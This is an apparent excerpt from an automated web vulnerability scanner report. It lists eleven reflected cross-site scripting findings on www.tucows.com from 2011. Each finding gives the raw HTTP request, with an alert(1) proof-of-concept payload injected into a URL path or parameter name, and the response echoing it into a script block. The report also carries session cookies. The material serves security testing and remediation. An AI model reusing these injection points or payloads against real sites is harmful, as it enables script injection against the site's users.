3.232. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e8a"-alert(1)-"2f831598e8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e2e8a"-alert(1)-"2f831598e8d=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/?e2e8a"-alert(1)-"2f831598e8d=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.233. http://www.tucows.com/about.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f530"-alert(1)-"6001743e8c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about.html8f530"-alert(1)-"6001743e8c7 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/about.html8f530"-alert(1)-"6001743e8c7";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.234. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf95a"-alert(1)-"9164bc1eed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about.html?cf95a"-alert(1)-"9164bc1eed8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 32110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/about.html?cf95a"-alert(1)-"9164bc1eed8=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.235. http://www.tucows.com/advertise.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5253"-alert(1)-"eb5b61b7f5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise.htmla5253"-alert(1)-"eb5b61b7f5a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/advertise.htmla5253"-alert(1)-"eb5b61b7f5a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.236. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff349"-alert(1)-"f7b0a9fb104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise.html?ff349"-alert(1)-"f7b0a9fb104=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/advertise.html?ff349"-alert(1)-"f7b0a9fb104=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.237. http://www.tucows.com/affiliate/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5278d"-alert(1)-"005c7cc4526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate5278d"-alert(1)-"005c7cc4526/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate5278d"-alert(1)-"005c7cc4526/index.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.238. http://www.tucows.com/affiliate/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd2c"-alert(1)-"15b6c2e9e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.239. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91153"-alert(1)-"4395b206045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.html?91153"-alert(1)-"4395b206045=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate/index.html?91153"-alert(1)-"4395b206045=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.240. http://www.tucows.com/author_ratings.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffad2"-alert(1)-"0aea99c7693 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author_ratings.htmlffad2"-alert(1)-"0aea99c7693 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/author_ratings.htmlffad2"-alert(1)-"0aea99c7693";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.241. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 509d3"-alert(1)-"fb9a5a72368 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.242. http://www.tucows.com/contact.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c33"-alert(1)-"30d1cfe8a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.html72c33"-alert(1)-"30d1cfe8a9a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/contact.html72c33"-alert(1)-"30d1cfe8a9a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

